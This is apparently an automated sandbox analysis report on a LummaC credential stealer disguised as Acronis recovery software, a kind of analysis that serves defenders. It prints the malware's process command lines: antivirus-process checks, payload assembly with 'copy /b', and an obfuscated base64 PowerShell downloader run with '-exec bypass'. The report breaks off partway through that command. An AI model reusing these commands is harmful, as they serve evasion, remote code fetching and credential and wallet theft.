Windows
Analysis Report
acronis recovery expert deluxe 1.0.0.132.rarl.exe
Overview
General Information
Detection
LummaC
Score: 100 (range: 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected UAC Bypass using CMSTP
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Encrypted powershell cmdline option found
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Overwrites code with unconditional jumps - possibly setting hooks in a foreign process
Powershell drops PE file
Query firmware table information (likely to detect VMs)
Sigma detected: Suspicious PowerShell Parameter Substring
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Execution of Powershell with Base64
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64_ra
- acronis recovery expert deluxe 1.0.0.132.rarl.exe (PID: 7144 cmdline: "C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe" MD5: 2C83FB776A9E238D88E32393F17AE06A)
- cmd.exe (PID: 6272 cmdline: "C:\Windows\System32\cmd.exe" /c copy Kill Kill.cmd & Kill.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 6296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- tasklist.exe (PID: 6668 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
- findstr.exe (PID: 6620 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
- tasklist.exe (PID: 5948 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
- findstr.exe (PID: 4692 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
- cmd.exe (PID: 5744 cmdline: cmd /c md 650429 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- findstr.exe (PID: 2864 cmdline: findstr /V "GERMANY" False MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
- cmd.exe (PID: 6148 cmdline: cmd /c copy /b ..\Murray + ..\Indication + ..\Institution + ..\Metres + ..\Display + ..\Cr + ..\Programming D MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- Palestine.com (PID: 6176 cmdline: Palestine.com D MD5: 62D09F076E6E0240548C2F837536A46A)
- powershell.exe (PID: 4540 cmdline:
powershell -exec bypass -ENc LgAoACgARwBFAFQALQB2AGEAUgBJAEEAQgBMAGUAIAAnACoATQBkAHIAKgAnACkALgBuAGEATQBlAFsAMwAsADEAMQAsADIAXQAtAGoAbwBJAG4AJwAnACkAIAAoACgAKAAnAFMARQB0AC0AdgBhAFIASQBhAEIAbABlACAAKAA2AFMAdgA4AG0AYQA2AFMAdgArADYAUwB2AEYAWgA2AFMAdgApACAAIAAoACAAWwBUAFkAcAAnACsAJwBFAF0AKAA2AFMAdgB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQB7ADEAfQA2AFMAdgAtAEYAbABUAFYAZQBsAFQAVgAsAGwAVAAnACsAJwBWAEkATgBsAFQAVgAsAGwAVABWAFMAeQAnACsAJwBTAFQAbABUAFYALABsAFQAVgBtAC4AaQBvAGwAVABWACwAbABUAFYALgBTAGUARQBLAG8AUgBJAEcAbABUAFYAKQApADsAIABzAEUAdAAtAEkAVABlAE0AIAAgAFYAYQByAGkAYQBiAGwAZQA6ADgAQQBQAGMAIAAgACgAIABbAFQAeQBwAGUAXQAoADYAUwB2AHsAMQB9AHsAMgB9AHsAMAB9ACcAKwAnADYAUwB2ACAALQBGACAAbABUAFYARABsAFQAVgAsAGwAVABWAFMAWQBzAGwAVABWACwAbABUAFYAdABFAE0ALgBnAFUAJwArACcASQBsAFQAJwArACcAVgApACAAIAApACAAOwAgAHMAVgAgAGMAZwAwACcAKwAnAHEAIAAoACAAWwB0AFkAUABlAF0AKAA2AFMAdgB7ADMAfQB7ADAAfQB7ADEAfQB7ADQAfQB7ADIAfQA2AFMAdgAgAC0ARgBsAFQAVgB0AGUATQAuAGkATwAnACsAJwBsAFQAVgAsAGwAVABWAC4AUABsAFQAVgAsAGwAVABWAGgAbABUAFYALABsAFQAVgBTAFkAUwBsAFQAVgAsAGwAVABWAEEAVAAnACsAJwBsAFQAVgApACkAJwArACcAIAA7ACAAUwBlAHQALQBWAGEAcgBpACcAKwAnAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAB1AEIAMgBnAHQAIAAtAFYAYQBsAHUAZQAgACgAWwBUAFkAUABlAF0AKAA2AFMAdgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQA2AFMAdgAgAC0AZgAgAGwAVABWAEUAbQAuAEkAJwArACcATwAuAEYAbABUAFYALABsAFQAVgBTAHkAbABUAFYALABsAFQAVgBTAFQAbABUAFYALABsAFQAVgBJAEwARQBsAFQAVgApACkAIAAgADsAIABTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgAHMAYwBSAEkAUABUAEIATABPAEMAawAgAC0AVgBhAGwAdQBlACAAKAB7AAoAIAAnACsAJwAgACAAIABTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgAFoASQBQAFUAUgBsACAALQBWAGEAbAB1AGUAIAAoADYAUwB2AHsAMwB9AHsANwB9AHsANgB9AHsANAB9AHsAOQB9AHsAMQB9AHsAMQAwAH0AewA4AH0AewAwAH0AewA1AH0AewAyAH0ANgBTAHYAIAAtAGYAbABUAFYAdABsACcAKwAnAFQAVgAsAGwAVABWAHAALwBsACcAKwAnAFQAVgAsAGwAVABWAHQAeAB0AGwAVABWACwAbABUAFYAaAB0AGwAVABWACwAbABUAFYAaQBwAHQAZQBkAGUAbABUAFYALABsAFQAVgBfAGMAbABwAF8AcABhAG4ALgBsAFQAVgAsAGwAVABWAHMAOgAvAC8AawBsAGwAVABWACwAbABUAFYAdABwAGwAVABWACwAbABUAFYAbgBsAFQAVgAsAGwAVABWAGgAbwBhAC4AcwBoACcAKwAnAG8AbABUAFYALABsAFQAVgBpAGwAVABWACkACgAgACAAIAAgAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAdwBFAEIAYwBsAEkARQBOAHQAIAAtAFYAYQBsAHUAZQAgACgALgAoADYAUwB2AHsAMQB9AHsAMgB9AHsAMAB9ADYAUwB2ACAALQBmAGwAVABWAGoAZQBjAHQAbABUAFYALABsAFQAVgBOAGUAdwBsAFQAVgAsAGwAVABWAC0ATwBiAGwAVABWACkAIAAoADYAUwB2AHsAMQB9AHsAMAB9AHsAMgB9AHsAMwB9ADYAUwB2AC0AZgAgAGwAVABWAGUAdAAuAFcAbABUAFYALABsAFQAVgBTAHkAcwAnACsAJwB0AGUAbQAuAE4AbABUAFYALABsAFQAVgBlAGwAVABWA